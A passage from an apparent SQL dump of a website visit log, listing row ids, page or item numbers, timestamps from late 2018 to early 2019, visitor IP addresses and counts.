18:48:22','159.203.101.95',2),(4025,8,'2018-10-11 18:48:28','159.203.101.95',2),(4026,10,'2018-10-12 19:12:41','184.154.36.186',2),(4027,6,'2018-10-12 21:19:57','207.46.13.134',5),(4028,7,'2018-10-14 00:10:12','66.249.73.72',4),(4029,8,'2018-10-14 00:37:12','100.43.81.105',5),(4030,10,'2018-10-14 01:43:33','69.140.240.88',5),(4031,6,'2018-10-14 18:35:43','93.158.161.1',8),(4032,10,'2018-10-15 04:29:12','148.64.56.68',6),(4033,7,'2018-10-15 07:57:50','142.93.69.193',5),(4034,8,'2018-10-15 07:57:56','142.93.69.193',18),(4035,6,'2018-10-15 19:06:15','204.126.132.241',5),(4036,10,'2018-10-16 05:05:15','172.73.73.10',4),(4037,8,'2018-10-16 13:35:27','204.126.132.241',4),(4038,7,'2018-10-17 00:37:37','157.55.39.75',4),(4039,6,'2018-10-17 05:05:42','66.249.65.146',6),(4040,10,'2018-10-17 19:07:33','184.154.36.184',3),(4041,8,'2018-10-18 13:28:08','38.94.182.187',1),(4042,10,'2018-10-18 19:10:30','184.154.36.184',5),(4043,7,'2018-10-19 01:30:17','73.135.219.20',4),(4044,7,'2018-10-19 01:30:17','73.135.219.20',1),(4045,6,'2018-10-19 02:42:19','207.46.13.139',5),(4046,8,'2018-10-19 15:49:29','66.249.65.146',2),(4047,10,'2018-10-19 21:50:16','96.231.167.231',5),(4048,6,'2018-10-20 06:18:09','66.249.65.146',5),(4049,8,'2018-10-20 17:50:55','138.197.64.69',3),(4050,7,'2018-10-20 17:50:59','138.197.64.69',2),(4051,10,'2018-10-20 22:56:10','207.46.13.139',5),(4052,6,'2018-10-21 22:27:26','40.77.167.51',5),(4053,8,'2018-10-22 03:18:41','40.77.167.149',2),(4054,10,'2018-10-22 03:55:24','37.187.56.76',4),(4055,7,'2018-10-22 03:55:30','37.187.56.76',3),(4056,6,'2018-10-23 02:39:29','66.249.65.150',2),(4057,8,'2018-10-23 05:39:03','5.255.250.111',3),(4058,10,'2018-10-23 19:04:35','184.154.36.186',2),(4059,7,'2018-10-24 18:06:17','159.65.37.98',3),(4060,8,'2018-10-24 18:06:23','159.65.37.98',5),(4061,6,'2018-10-24 18:06:23','159.65.37.98',5),(4062,10,'2018-10-24 19:10:56','184.154.36.184',3),(4063,7,'2018-10-25 19:05:58','184.154.36.184',3),(4064,8,'2018-10-26 02:47:39','40.77.167.103',3),(4065,6,'2018-10-26 03:39:44','220.243.135.135',2),(4066,10,'2018-10-26 03:39:44','220.243.136.198',3),(4067,10,'2018-10-27 19:02:12','184.154.36.185',2),(4068,7,'2018-10-28 10:36:54','141.8.143.141',4),(4069,6,'2018-10-28 11:04:16','66.249.79.76',6),(4070,8,'2018-10-28 22:04:55','220.243.135.162',3),(4071,10,'2018-10-28 22:04:59','220.243.135.144',7),(4072,7,'2018-10-29 15:45:15','17.58.98.194',3),(4073,6,'2018-10-29 20:55:14','72.48.167.90',2),(4074,10,'2018-10-30 12:21:41','35.160.123.2',3),(4075,7,'2018-10-31 04:24:44','148.64.56.73',2),(4076,8,'2018-10-31 04:25:33','91.242.162.43',2),(4077,6,'2018-10-31 07:56:00','91.242.162.43',2),(4078,10,'2018-10-31 19:07:29','184.154.36.186',7),(4079,6,'2018-11-01 18:52:56','108.3.163.9',7),(4080,10,'2018-11-01 19:10:06','184.154.36.183',4),(4081,7,'2018-11-01 21:45:41','66.249.79.76',5),(4082,8,'2018-11-02 19:08:05','184.154.36.186',3),(4083,6,'2018-11-02 19:08:57','184.154.36.186',8),(4084,10,'2018-11-03 04:24:23','148.64.56.68',3),(4085,7,'2018-11-03 07:13:19','138.197.3.188',2),(4086,8,'2018-11-03 23:35:11','18.196.149.126',2),(4087,10,'2018-11-04 18:56:00','174.205.27.15',3),(4088,6,'2018-11-04 20:10:52','184.154.36.183',7),(4089,7,'2018-11-05 10:56:48','69.243.41.253',3),(4090,8,'2018-11-05 12:23:34','91.121.79.180',1),(4091,6,'2018-11-06 00:45:36','76.21.234.45',2),(4092,10,'2018-11-06 03:21:48','174.205.22.99',2),(4093,8,'2018-11-07 05:20:22','141.8.143.141',1),(4094,10,'2018-11-07 08:46:37','141.8.143.141',2),(4095,7,'2018-11-07 09:07:47','52.162.211.179',1),(4096,6,'2018-11-07 13:13:05','141.8.143.141',8),(4097,8,'2018-11-08 14:58:06','38.94.176.162',3),(4098,6,'2018-11-08 17:04:50','66.249.75.154',6),(4099,10,'2018-11-08 21:05:20','141.8.143.141',5),(4100,7,'2018-11-09 10:45:02','138.197.7.85',3),(4101,6,'2018-11-09 20:04:40','184.154.36.186',3),(4102,10,'2018-11-10 10:40:08','40.77.167.163',2),(4103,8,'2018-11-10 17:39:48','37.9.113.90',2),(4104,7,'2018-11-10 17:45:57','18.194.232.170',2),(4105,6,'2018-11-11 09:07:48','141.8.143.141',3),(4106,10,'2018-11-11 18:23:29','71.244.131.241',3),(4107,6,'2018-11-12 20:07:05','184.154.36.183',1),(4108,10,'2018-11-12 21:24:40','73.204.199.78',3),(4109,7,'2018-11-12 22:38:20','73.128.239.131',3),(4110,8,'2018-11-13 11:38:57','178.154.246.134',3),(4111,6,'2018-11-13 20:09:39','184.154.36.184',4),(4112,10,'2018-11-13 21:56:25','18.144.35.66',1),(4113,7,'2018-11-13 23:12:41','73.128.239.131',1),(4114,6,'2018-11-14 20:10:29','184.154.36.186',5),(4115,10,'2018-11-14 23:58:15','172.58.185.16',2),(4116,7,'2018-11-15 06:52:51','34.238.148.49',3),(4117,8,'2018-11-15 16:18:47','138.197.3.124',2),(4118,10,'2018-11-16 01:39:09','69.243.41.253',5),(4119,6,'2018-11-16 07:40:22','157.55.39.201',7),(4120,7,'2018-11-16 11:41:33','35.240.58.73',7),(4121,8,'2018-11-16 21:38:46','150.148.14.158',1),(4122,10,'2018-11-17 05:15:14','73.201.96.160',5),(4123,6,'2018-11-17 19:39:12','207.46.13.45',4),(4124,7,'2018-11-18 00:50:12','207.46.13.123',3),(4125,8,'2018-11-18 12:53:07','141.8.143.141',3),(4126,10,'2018-11-18 15:14:48','66.249.75.154',4),(4127,6,'2018-11-18 20:01:14','184.154.36.171',6),(4128,7,'2018-11-19 09:59:48','188.165.196.25',3),(4129,6,'2018-11-19 20:09:14','184.154.36.183',9),(4130,8,'2018-11-19 20:22:12','66.249.75.156',2),(4131,10,'2018-11-20 16:47:43','73.163.216.229',3),(4132,6,'2018-11-21 00:00:20','173.69.174.229',8),(4133,8,'2018-11-21 10:07:49','157.55.39.184',2),(4134,7,'2018-11-21 16:08:41','54.174.55.123',2),(4135,8,'2018-11-22 11:17:52','138.197.6.55',2),(4136,10,'2018-11-22 11:17:57','138.197.6.55',1),(4137,6,'2018-11-22 11:18:05','138.197.6.55',5),(4138,10,'2018-11-23 13:59:37','68.134.164.221',4),(4139,7,'2018-11-23 18:59:37','52.162.211.179',3),(4140,8,'2018-11-23 19:18:58','35.237.109.134',2),(4141,6,'2018-11-23 19:25:11','35.237.109.134',4),(4142,6,'2018-11-24 20:02:52','184.154.36.171',1),(4143,7,'2018-11-25 20:04:52','184.154.36.183',3),(4144,6,'2018-11-25 20:04:57','184.154.36.183',5),(4145,8,'2018-11-26 09:11:49','40.77.167.53',1),(4146,10,'2018-11-26 13:48:34','75.102.137.52',23),(4147,6,'2018-11-27 03:07:53','100.36.60.74',6),(4148,7,'2018-11-27 03:08:20','207.46.13.125',2),(4149,8,'2018-11-27 15:04:29','50.226.149.83',1),(4150,10,'2018-11-27 15:49:24','91.242.162.37',3),(4151,6,'2018-11-28 14:09:25','207.46.13.181',7),(4152,10,'2018-11-28 16:22:50','69.195.247.116',3),(4153,8,'2018-11-28 16:39:45','207.46.13.179',2),(4154,7,'2018-11-28 19:42:17','23.254.4.109',12),(4155,6,'2018-11-29 20:10:47','184.154.36.171',2),(4156,8,'2018-11-29 20:33:04','38.77.220.31',1),(4157,7,'2018-11-29 23:52:50','173.252.95.18',3),(4158,10,'2018-11-30 22:12:13','207.46.13.97',12),(4159,7,'2018-11-30 23:54:41','167.114.117.176',3),(4160,8,'2018-11-30 23:55:00','167.114.117.176',3),(4161,6,'2018-11-30 23:55:05','167.114.117.176',8),(4162,10,'2018-12-01 23:24:31','165.227.98.144',1),(4163,8,'2018-12-02 00:04:04','207.46.13.87',2),(4164,7,'2018-12-02 07:42:45','66.249.79.50',2),(4165,6,'2018-12-02 20:06:16','184.154.36.171',2),(4166,10,'2018-12-03 09:47:25','198.27.80.144',1),(4167,7,'2018-12-03 09:47:31','198.27.80.144',2),(4168,8,'2018-12-03 09:47:49','198.27.80.144',2),(4169,6,'2018-12-03 20:08:44','184.154.36.184',3),(4170,8,'2018-12-04 18:02:56','173.44.152.99',1),(4171,6,'2018-12-04 22:39:25','100.35.75.170',4),(4172,10,'2018-12-05 03:21:00','71.179.179.107',4),(4173,7,'2018-12-05 06:23:58','91.242.162.39',2),(4174,8,'2018-12-05 19:20:25','138.197.64.41',4),(4175,7,'2018-12-06 10:23:22','91.242.162.9',1),(4176,6,'2018-12-06 20:08:51','184.154.36.171',5),(4177,10,'2018-12-07 03:34:47','40.77.167.158',2),(4178,8,'2018-12-07 04:51:46','40.77.167.15',3),(4179,7,'2018-12-07 17:53:47','54.38.252.149',2),(4180,6,'2018-12-07 20:15:26','184.154.36.186',3),(4181,7,'2018-12-08 20:23:14','178.255.215.93',3),(4182,10,'2018-12-08 22:46:02','108.51.232.26',3),(4183,6,'2018-12-09 10:25:37','40.77.167.95',7),(4184,8,'2018-12-09 22:22:26','173.69.174.232',5),(4185,7,'2018-12-09 23:14:37','66.249.79.50',3),(4186,6,'2018-12-10 14:54:50','195.88.16.114',3),(4187,10,'2018-12-10 17:39:28','71.179.165.166',2),(4188,7,'2018-12-10 23:16:39','100.18.5.195',4),(4189,6,'2018-12-11 16:53:17','204.126.132.241',5),(4190,8,'2018-12-12 07:26:06','157.55.39.142',2),(4191,7,'2018-12-12 15:21:11','165.227.122.204',1),(4192,10,'2018-12-12 15:21:16','165.227.122.204',2),(4193,6,'2018-12-12 20:09:03','184.154.36.171',7),(4194,8,'2018-12-13 17:47:41','35.237.158.232',3),(4195,10,'2018-12-13 18:14:43','35.237.158.232',3),(4196,7,'2018-12-13 18:15:27','35.237.158.232',3),(4197,6,'2018-12-14 04:05:23','35.243.155.89',4),(4198,7,'2018-12-14 18:34:03','207.46.13.136',1),(4199,10,'2018-12-14 19:32:19','178.255.215.93',1),(4200,6,'2018-12-15 19:30:20','50.226.149.83',4),(4201,10,'2018-12-16 04:30:49','207.46.13.102',11),(4202,7,'2018-12-16 14:10:06','40.77.167.88',4),(4203,8,'2018-12-16 17:24:06','207.46.13.121',4),(4204,6,'2018-12-16 20:09:59','184.154.36.183',6),(4205,10,'2018-12-17 06:15:55','91.121.79.180',2),(4206,7,'2018-12-17 17:43:53','66.249.73.74',3),(4207,8,'2018-12-17 18:49:30','35.195.245.136',2),(4208,6,'2018-12-17 20:11:35','184.154.36.171',9),(4209,6,'2018-12-18 21:59:12','198.51.197.42',9),(4210,8,'2018-12-18 21:59:18','198.51.197.42',3),(4211,10,'2018-12-19 02:57:34','107.77.203.113',4),(4212,8,'2018-12-19 22:18:18','138.197.64.75',5),(4213,7,'2018-12-19 22:18:24','138.197.64.75',1),(4214,6,'2018-12-19 22:18:25','138.197.64.75',3),(4215,6,'2018-12-21 04:49:14','65.111.73.50',2),(4216,8,'2018-12-21 13:06:39','157.55.39.86',1),(4217,6,'2018-12-22 14:57:40','100.16.192.72',3),(4218,6,'2018-12-23 20:09:55','184.154.36.171',3),(4219,7,'2018-12-24 19:36:59','175.107.212.106',2),(4220,6,'2018-12-24 21:14:56','100.36.77.228',6),(4221,10,'2018-12-24 23:03:14','40.77.167.72',1),(4222,6,'2018-12-25 21:55:52','100.16.192.72',5),(4223,7,'2018-12-25 23:19:51','40.77.167.167',3),(4224,8,'2018-12-26 11:44:41','169.252.4.23',5),(4225,10,'2018-12-26 13:01:08','167.114.65.240',3),(4226,6,'2018-12-27 03:26:40','138.197.11.133',5),(4227,7,'2018-12-27 03:26:47','138.197.11.133',3),(4228,8,'2018-12-27 12:45:03','40.77.167.1',1),(4229,7,'2018-12-28 03:57:27','108.190.158.198',2),(4230,6,'2018-12-28 11:29:51','207.46.13.163',7),(4231,10,'2018-12-28 21:57:16','13.57.11.195',2),(4232,8,'2018-12-29 05:58:45','207.46.13.218',2),(4233,6,'2018-12-29 15:19:58','66.249.75.154',8),(4234,7,'2018-12-29 17:22:37','157.55.39.220',1),(4235,8,'2018-12-30 10:14:53','157.55.39.129',4),(4236,10,'2018-12-30 12:12:37','24.126.83.154',4),(4237,7,'2018-12-31 00:04:21','167.114.172.225',3),(4238,6,'2018-12-31 00:04:47','167.114.172.225',4),(4239,10,'2018-12-31 20:04:59','184.154.36.183',3),(4240,8,'2019-01-01 20:12:05','184.154.36.185',3),(4241,10,'2019-01-01 20:12:25','184.154.36.185',2),(4242,7,'2019-01-01 20:13:12','184.154.36.185',2),(4243,6,'2019-01-01 20:14:08','184.154.36.185',4),(4244,6,'2019-01-02 21:32:37','134.192.250.80',8),(4245,8,'2019-01-03 00:10:35','108.15.27.31',5),(4246,7,'2019-01-03 11:49:29','91.242.162.17',1),(4247,10,'2019-01-03 20:15:25','50.235.92.118',2),(4248,6,'2019-01-04 02:19:53','76.21.234.45',3),(4249,7,'2019-01-04 20:05:38','184.154.36.186',1),(4250,10,'2019-01-04 21:54:30','100.36.78.30',3),(4251,6,'2019-01-05 05:33:12','207.46.13.23',6),(4252,8,'2019-01-05 13:21:23','207.46.13.164',1),(4253,7,'2019-01-06 00:34:23','157.55.39.155',1),(4254,6,'2019-01-06 20:08:10','184.154.36.171',6),(4255,10,'2019-01-07 01:16:59','96.234.206.57',3),(4256,7,'2019-01-07 01:17:05','96.234.206.57',5),(4257,8,'2019-01-07 04:19:05','142.93.73.184',3),(4258,6,'2019-01-08 01:38:10','71.121.167.237',5),(4259,8,'2019-01-08 20:01:31','107.77.204.54',1),(4260,10,'2019-01-08 20:05:59','107.77.204.54',4),(4261,7,'2019-01-09 00:40:39','66.249.79.44',1),(4262,6,'2019-01-09 06:04:54','148.64.56.69',7),(4263,10,'2019-01-09 20:11:25','184.154.36.185',5),(4264,8,'2019-01-09 21:50:26','96.244.235.167',5),(4265,7,'2019-01-10 03:24:34','138.197.13.208',3),(4266,6,'2019-01-10 07:16:58','73.87.236.120',10),(4267,10,'2019-01-11 06:34:21','167.114.157.79',2),(4268,7,'2019-01-11 06:34:26','167.114.157.79',1),(4269,8,'2019-01-11 06:34:45','167.114.157.79',3),(4270,6,'2019-01-11 18:06:29','198.51.197.42',7),(4271,8,'2019-01-12 13:45:49','35.237.216.196',2),(4272,10,'2019-01-12 13:54:26','35.237.216.196',4),(4273,7,'2019-01-12 13:54:45','35.237.216.196',2),(4274,6,'2019-01-12 20:08:23','184.154.36.171',3),(4275,6,'2019-01-13 20:26:42','96.234.206.57',9),(4276,10,'2019-01-14 00:12:05','72.186.253.78',3),(4277,7,'2019-01-14 08:21:56','5.255.250.27',6),(4278,8,'2019-01-14 10:42:30','37.187.56.81',1),(4279,6,'2019-01-15 01:55:35','178.154.246.134',3),(4280,10,'2019-01-15 03:41:39','71.244.205.53',6),(4281,7,'2019-01-15 09:50:15','207.46.13.5',2),(4282,8,'2019-01-15 18:01:15','204.126.132.231',4),(4283,10,'2019-01-16 06:06:02','142.93.69.187',13),(4284,6,'2019-01-16 06:06:03','142.93.69.187',11),(4285,8,'2019-01-16 19:33:19','104.155.111.148',1),(4286,7,'2019-01-16 19:34:32','104.155.111.148',2),(4287,6,'2019-01-17 16:06:52','50.225.39.84',4),(4288,10,'2019-01-17 20:34:01','73.201.254.172',5),(4289,7,'2019-01-17 23:30:22','172.56.3.67',4),(4290,8,'2019-01-18 06:40:14','157.55.39.57',2),(4291,6,'2019-01-18 20:06:52','184.154.36.186',3),(4292,10,'2019-01-19 00:40:28','68.134.124.158',2),(4293,7,'2019-01-19 16:58:28','174.205.0.118',3),(4294,10,'2019-01-20 01:43:53','108.28.61.219',6),(4295,8,'2019-01-20 13:57:41','91.242.162.24',2),(4296,6,'2019-01-20 20:12:08','184.154.36.183',4),(4297,10,'2019-01-21 03:02:58','178.154.246.134',8),(4298,7,'2019-01-21 09:23:20','138.68.180.18',1),(4299,8,'2019-01-21 20:35:59','71.179.179.138',1),(4300,10,'2019-01-22 05:32:54','148.64.56.76',2),(4301,6,'2019-01-22 07:04:13','66.249.79.44',21),(4302,7,'2019-01-22 22:46:25','138.197.64.69',2),(4303,8,'2019-01-22 22:46:26','138.197.64.69',10),(4304,10,'2019-01-23 05:38:29','148.64.56.76',3),(4305,6,'2019-01-23 16:06:57','173.167.202.177',6),(4306,8,'2019-01-24 00:56:15','40.77.167.18',7),(4307,10,'2019-01-24 11:04:25','158.69.27.211',2),(4308,7,'2019-01-24 11:04:30','158.69.27.211',3),(4309,6,'2019-01-24 18:59:58','50.225.39.88',14),(4310,8,'2019-01-25 12:36:19','173.167.202.177',4),(4311,6,'2019-01-25 20:06:23','184.154.36.183',19),(4312,10,'2019-01-26 11:00:05','23.101.169.3',6),(4313,7,'2019-01-26 18:54:25','178.255.215.93',2),(4314,6,'2019-01-26 20:07:26','184.154.36.184',4),(4315,8,'2019-01-26 23:47:57','71.121.167.237',2),(4316,7,'2019-01-27 20:02:42','184.154.36.171',2),(4317,6,'2019-01-27 22:08:13','66.249.79.47',11),(4318,10,'2019-01-28 02:28:12','73.128.45.229',5),(4319,8,'2019-01-28 04:27:58','142.4.215.116',3),(4320,7,'2019-01-28 20:13:31','134.192.250.71',5),(4321,6,'2019-01-28 23:36:56','71.244.216.250',4),(4322,10,'2019-01-29 04:54:14','174.205.13.77',3),(4323,8,'2019-01-29 19:40:36','50.207.202.114',8),(4324,6,'2019-01-30 02:28:20','73.173.36.187',10),(4325,10,'2019-01-30 09:22:30','138.197.111.17',2),(4326,7,'2019-01-30 09:22:36','138.197.111.17',4),(4327,8,'2019-01-31 00:07:49','73.191.60.4',7),(4328,6,'2019-01-31 06:05:18','34.73.251.133',10),(4329,10,'2019-01-31 11:56:42','34.73.180.122',10),(4330,7,'2019-01-31 11:58:37','34.73.180.122',13),(4331,6,'2019-02-01 06:06:41','96.244.226.141',7),(4332,7,'2019-02-01 13:26:17','50.225.39.71',4),(4333,10,'2019-02-01 19:14:38','68.134.124.158',12),(4334,8,'2019-02-01 22:01:19','220.243.136.202',5),(4335,6,'2019-02-02 06:36:18','148.64.56.69',14),(4336,7,'2019-02-02 17:12:40','35.237.182.109',4),(4337,10,'2019-02-02 19:32:43','35.229.45.207',3),(4338,8,'2019-02-03 05:14:08','35.227.33.87',2),(4339,6,'2019-02-03 20:04:26','71.244.216.250',7),(4340,7,'2019-02-04 09:20:34','66.249.79.44',5),(4341,10,'2019-02-04 11:40:07','45.55.241.155',6),(4342,8,'2019-02-04 11:40:14','45.55.241.155',3),(4343,6,'2019-02-04 20:07:19','184.154.36.186',8),(4344,7,'2019-02-05 10:31:42','35.185.66.21',2),(4345,8,'2019-02-05 14:29:48','172.56.22.243',4),(4346,6,'2019-02-05 20:10:54','184.154.36.186',5),(4347,7,'2019-02-06 17:43:44','64.21.98.47',5),(4348,8,'2019-02-06 18:11:09','35.237.83.32',5),(4349,10,'2019-02-06 19:25:58','35.237.83.32',3),(4350,6,'2019-02-06 20:56:17','153.31.113.20',7),(4351,8,'2019-02-07 22:00:27','96.244.217.137',8),(4352,6,'2019-02-08 00:22:49','35.227.91.93',8),(4353,10,'2019-02-08 00:23:11','35.227.91.93',9),(4354,7,'2019-02-08 00:24:25','35.227.91.93',4),(4355,6,'2019-02-09 01:12:43','100.36.91.216',8),(4356,7,'2019-02-09 02:11:40','40.77.167.145',3),(4357,8,'2019-02-09 04:57:25','35.237.83.32',6),(4358,10,'2019-02-09 05:26:15','35.237.83.32',3),(4359,6,'2019-02-10 02:59:58','40.77.167.105',9),(4360,7,'2019-02-10 03:49:35','34.73.170.49',5),(4361,8,'2019-02-10 16:12:53','34.73.170.49',15),(4362,10,'2019-02-10 16:53:13','34.73.170.49',5),(4363,7,'2019-02-11 07:58:41','52.162.211.179',6),(4364,6,'2019-02-11 09:32:04','198.27.80.144',12),(4365,8,'2019-02-11 21:38:03','157.55.39.217',11),(4366,10,'2019-02-11 21:57:53','54.193.53.242',7),(4367,7,'2019-02-12 11:04:19','73.135.219.228',8),(4368,6,'2019-02-12 11:19:24','34.73.48.18',13),(4369,8,'2019-02-13 01:59:28','35.196.75.203',5),(4370,10,'2019-02-13 02:32:50','35.196.75.203',5),(4371,6,'2019-02-13 13:03:12','66.249.73.76',11),(4372,7,'2019-02-13 14:11:04','142.4.218.236',3),(4373,8,'2019-02-14 05:17:30','35.243.142.104',7),(4374,10,'2019-02-14 06:12:20','35.243.142.104',3),(4375,6,'2019-02-14 13:22:55','50.225.39.84',7),(4376,7,'2019-02-14 17:28:48','35.237.18.63',2),(4377,10,'2019-02-15 06:58:23','69.58.178.57',5),(4378,8,'2019-02-15 07:07:30','35.229.45.207',6),(4379,6,'2019-02-15 14:18:10','50.225.39.75',9),(4380,7,'2019-02-16 05:29:19','35.196.250.123',2),(4381,6,'2019-02-16 19:26:51','71.244.145.231',6),(4382,8,'2019-02-16 20:42:44','71.121.245.116',3),(4383,10,'2019-02-17 02:52:57','35.243.242.1',5),(4384,6,'2019-02-17 20:11:44','184.154.36.184',8),(4385,7,'2019-02-17 20:49:23','35.227.49.189',3),(4386,8,'2019-02-18 09:59:54','38.77.220.24',25),(4387,10,'2019-02-18 13:52:32','68.33.93.255',19),(4388,7,'2019-02-18 22:43:23','78.46.156.169',14),(4389,6,'2019-02-18 22:43:51','78.46.156.169',20),(4390,10,'2019-02-19 15:09:05','155.220.250.114',5),(4391,8,'2019-02-19 15:12:05','155.220.250.114',7),(4392,6,'2019-02-20 00:00:10','71.244.145.231',11),(4393,7,'2019-02-20 00:51:13','35.243.253.151',3),(4394,8,'2019-02-20 17:43:03','34.73.239.30',6),(4395,10,'2019-02-20 18:05:16','34.73.239.30',7),(4396,6,'2019-02-21 01:29:45','71.244.145.231',11),(4397,7,'2019-02-21 01:59:01','35.227.90.9',5),(4398,8,'2019-02-21 19:37:36','35.227.16.80',4),(4399,10,'2019-02-21 19:57:59','35.227.16.80',2),(4400,6,'2019-02-22 04:15:42','69.140.139.112',10),(4401,7,'2019-02-22 06:11:09','35.237.182.109',4),(4402,8,'2019-02-22 22:02:18','35.237.18.63',6),(4403,10,'2019-02-22 22:21:22','35.237.18.63',7),(4404,6,'2019-02-23 05:44:16','35.231.112.211',9),(4405,7,'2019-02-23 10:13:06','66.249.69.68',6),(4406,8,'2019-02-24 01:14:31','35.237.83.32',5),(4407,10,'2019-02-24 01:56:04','157.55.39.131',4),(4408,6,'2019-02-24 06:15:08','207.46.13.148',10),(4409,8,'2019-02-25 02:17:45','35.243.191.168',10),(4410,10,'2019-02-25 02:36:25','35.243.191.168',6),(4411,7,'2019-02-25 02:37:23','35.243.191.168',6),(4412,6,'2019-02-25 13:34:14','37.187.56.81',9),(4413,10,'2019-02-26 04:06:37','64.92.7.210',5),(4414,8,'2019-02-26 05:23:34','34.73.232.191',6),(4415,7,'2019-02-26 05:40:51','34.73.232.191',7),(4416,6,'2019-02-26 20:07:18','184.154.36.183',8),(4417,10,'2019-02-27 11:50:20','23.101.169.3',5),(4418,8,'2019-02-27 14:51:48','35.237.78.30',7),(4419,7,'2019-02-27 15:10:52','35.237.78.30',3),(4420,6,'2019-02-27 21:16:22','157.55.39.250',6),(4421,8,'2019-02-28 19:22:26','35.237.78.30',5),(4422,10,'2019-02-28 19:39:29','35.237.78.30',4),(4423,7,'2019-02-28 19:40:15','35.237.78.30',3),(4424,6,'2019-03-01 00:59:37','35.243.139.92',6),(4425,7,'2019-03-01 20:36:31','52.162.211.179',2),(4426,10,'2019-03-01 22:01:26','207.46.13.70',9),(4427,6,'2019-03-02 02:52:18','40.77.167.128',10),(4428,8,'2019-03-02 18:07:37','17.58.98.194',4),(4429,10,'2019-03-02 23:42:54','69.143.204.33',6),(4430,7,'2019-03-03 00:39:53','35.231.84.26',4),(4431,8,'2019-03-03 19:40:21','35.231.27.112',17),(4432,6,'2019-03-03 19:57:38','35.231.27.112',12),(4433,10,'2019-03-04 00:01:08','40.77.167.212',7),(4434,7,'2019-03-04 01:28:57','165.227.73.7',7),(4435,8,'2019-03-04 19:52:12','35.243.242.1',7),(4436,6,'2019-03-04 20:06:34','184.154.36.171',10),(4437,10,'2019-03-05 00:57:20','207.46.13.82',6),(4438,7,'2019-03-05 14:41:52','35.243.191.168',3),(4439,6,'2019-03-05 20:11:12','96.37.0.224',6),(4440,10,'2019-03-06 03:59:26','157.55.39.232',5),(4441,8,'2019-03-06 09:57:14','141.8.143.141',3),(4442,7,'2019-03-06 15:09:35','35.227.49.189',3),(4443,10,'2019-03-07 07:32:46','207.46.13.216',3),(4444,8,'2019-03-07 11:45:13','50.225.39.82',5),(4445,6,'2019-03-07 14:34:45','35.227.49.189',4),(4446,10,'2019-03-08 08:27:35','157.55.39.68',4),(4447,6,'2019-03-08 20:06:08','184.154.36.184',8),(4448,8,'2019-03-08 20:39:45','35.229.110.111',2),(4449,7,'2019-03-08 20:57:14','35.229.110.111',2),(4450,10,'2019-03-09 09:36:50','207.46.13.101',11),(4451,6,'2019-03-09 20:09:26','184.154.36.186',16),(4452,7,'2019-03-09 22:20:40','17.58.98.194',7),(4453,8,'2019-03-09 23:12:22','35.243.163.195',5),(4454,10,'2019-03-10 10:13:22','159.89.176.204',3),(4455,6,'2019-03-10 21:32:46','99.203.81.247',8),(4456,8,'2019-03-11 00:05:29','100.16.160.173',7),(4457,7,'2019-03-11 04:08:17','157.55.39.53',3),(4458,10,'2019-03-11 12:02:09','35.243.163.195',5),(4459,6,'2019-03-11 22:57:20','72.81.227.219',15),(4460,8,'2019-03-12 14:12:16','50.225.39.86',12),(4461,10,'2019-03-12 14:30:55','35.243.139.92',3),(4462,7,'2019-03-12 14:31:52','35.243.139.92',2),(4463,6,'2019-03-12 23:27:18','108.31.56.19',15),(4464,10,'2019-03-13 15:39:17','71.162.214.76',4),(4465,8,'2019-03-13 19:06:37','184.154.36.171',9),(4466,6,'2019-03-14 02:54:39','35.237.78.30',16),(4467,7,'2019-03-14 02:55:41','35.237.78.30',5),(4468,10,'2019-03-14 16:34:54','69.60.32.80',6),(4469,8,'2019-03-14 21:14:53','35.243.139.92',5),(4470,6,'2019-03-15 05:26:30','89.234.68.89',7),(4471,7,'2019-03-15 13:58:05','34.73.175.136',4),(4472,10,'2019-03-15 19:04:58','35.196.250.123',5),(4473,8,'2019-03-16 03:09:33','69.143.141.242',6),(4474,6,'2019-03-16 07:23:10','138.197.111.17',4),(4475,7,'2019-03-16 18:17:55','35.231.109.172',4),(4476,10,'2019-03-16 19:14:19','184.154.36.171',5),(4477,8,'2019-03-17 09:51:40','35.196.250.123',8),(4478,6,'2019-03-17 10:07:33','35.196.250.123',11),(4479,10,'2019-03-17 21:39:58','158.69.225.37',5),(4480,7,'2019-03-17 21:40:03','158.69.225.37',3),(4481,6,'2019-03-18 12:25:40','50.225.39.88',19),(4482,8,'2019-03-18 15:29:07','69.140.139.112',15),(4483,10,'2019-03-18 22:45:09','209.95.51.168',6),(4484,7,'2019-03-18 22:45:37','209.95.51.168',5),(4485,6,'2019-03-19 12:38:47','50.225.39.75',17),(4486,8,'2019-03-19 15:49:39','50.225.39.75',6),(4487,7,'2019-03-19 22:45:46','52.91.123.99',5),(4488,10,'2019-03-20 01:00:51','207.46.13.66',3),(4489,8,'2019-03-20 17:49:25','50.200.35.131',9),(4490,6,'2019-03-20 20:38:29','67.132.207.28',5),(4491,7,'2019-03-21 00:25:08','157.55.39.191',2),(4492,10,'2019-03-21 02:20:50','109.95.32.172',7),(4493,8,'2019-03-21 18:47:51','50.225.39.75',6),(4494,7,'2019-03-22 01:10:33','157.55.39.159',2),(4495,10,'2019-03-22 03:10:32','157.55.39.57',3),(4496,6,'2019-03-22 17:32:49','50.225.39.75',8),(4497,8,'2019-03-23 03:52:12','35.227.49.189',3),(4498,10,'2019-03-23 04:01:03','207.46.13.112',5),(4499,7,'2019-03-23 04:08:45','35.227.49.189',3),(4500,6,'2019-03-23 18:00:57','207.46.13.250',4),(4501,10,'2019-03-24 04:56:38','157.55.39.56',7),(4502,8,'2019-03-24 15:47:13','66.249.73.65',17),(4503,6,'2019-03-24 19:31:48','71.244.131.250',18),(4504,7,'2019-03-24 22:05:33','35.237.182.109',8),(4505,10,'2019-03-25 05:38:23','40.77.167.15',6),(4506,8,'2019-03-25 18:12:41','52.162.211.179',11),(4507,6,'2019-03-25 22:58:46','35.227.49.189',10),(4508,7,'2019-03-25 23:00:10','35.227.49.189',3),(4509,10,'2019-03-26 06:40:20','157.55.39.66',6),(4510,8,'2019-03-26 19:41:29','35.196.91.62',20),(4511,6,'2019-03-26 23:38:44','68.134.35.171',16),(4512,10,'2019-03-27 07:52:35','207.46.13.91',5),(4513,7,'2019-03-27 15:13:18','34.73.154.46',4),(4514,8,'2019-03-27 20:41:48','35.231.182.45',15),(4515,10,'2019-03-28 08:56:26','207.46.13.112',5),(4516,6,'2019-03-28 12:26:42','50.225.39.85',31),(4517,8,'2019-03-28 21:47:19','71.179.179.138',15),(4518,7,'2019-03-28 21:59:02','13.57.252.112',6),(4519,10,'2019-03-29 09:44:17','40.77.167.148',12),(4520,6,'2019-03-29 13:19:08','66.102.6.204',21),(4521,7,'2019-03-29 21:59:27','35.237.54.151',7),(4522,8,'2019-03-29 23:47:00','173.79.181.22',9),(4523,10,'2019-03-30 12:16:29','40.77.167.178',3),(4524,6,'2019-03-30 